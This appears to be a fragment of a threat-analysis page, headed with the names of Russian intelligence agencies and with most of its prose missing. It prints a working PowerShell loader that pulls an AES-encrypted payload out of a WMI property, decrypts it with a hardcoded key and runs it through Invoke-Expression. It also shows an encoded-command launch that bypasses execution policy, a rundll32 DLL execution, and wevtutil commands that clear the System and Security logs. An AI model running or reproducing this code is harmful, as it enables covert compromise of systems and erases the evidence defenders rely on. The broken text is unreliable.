-----

-----

**Главное Разведывательное Управление**

**“** **”**

**Федеральная Служба Безопасности**

**Служба Внешней Разведки**

```
powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQAp
```

*Note: the Base64 argument shown here is UTF-16LE text that decodes to `function perfCr($crTr, $data)`, the first line of the script listed below.*

-----

```powershell
function perfCr($crTr, $data){
    $ret = $null
    try{
        $ms = New-Object System.IO.MemoryStream
        $cs = New-Object System.Security.Cryptography.CryptoStream -ArgumentList @($ms, $crTr, [System.Security.Cryptography.CryptoStreamMode]::Write)
        $cs.Write($data, 0, $data.Length)
        $cs.FlushFinalBlock()
        $ret = $ms.ToArray()
        $cs.Close()
        $ms.Close()
    }
    catch{}
    return $ret
}
function decrAes($encData, $key, $iv)
{
    $ret = $null
    try{
        $prov = New-Object System.Security.Cryptography.RijndaelManaged
        $prov.Key = $key
        $prov.IV = $iv
        $decr = $prov.CreateDecryptor($prov.Key, $prov.IV)
        $ret = perfCr $decr $encData
    }
    Catch{}
    return $ret
}
function sWP($cN, $pN, $aK, $aI)
{
    if($cN -eq $null -or $pN -eq $null){return $false}
    try{
        $wp = ([wmiclass]$cN).Properties[$pN].Value
        $exEn = [Convert]::FromBase64String($wp)
        $exDec = decrAes $exEn $aK $aI
        $ex = [Text.Encoding]::UTF8.GetString($exDec)
        if($ex -eq $null -or $ex -eq '')
        {return}
        Invoke-Expression $ex
        return $true
    }
    catch{
```

-----

```powershell
}
$aeK = [byte[]] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee,
    0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed, 0xff, 0x02, 0x43,
    0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)
$aeI = [byte[]] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7, 0xaa, 0x6d, 0xe9,
    0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67)
sWP ‘Wmi’ ‘Wmi’ $aeK $aeI | Out-Null
```

```
rundll32.exe “C:\Windows\twain_64.dll”
wevtutil cl System
wevtutil cl Security
```

-----

-----

**“** **”** **…**

-----

-----

**“** **”**

-----

**©**

-----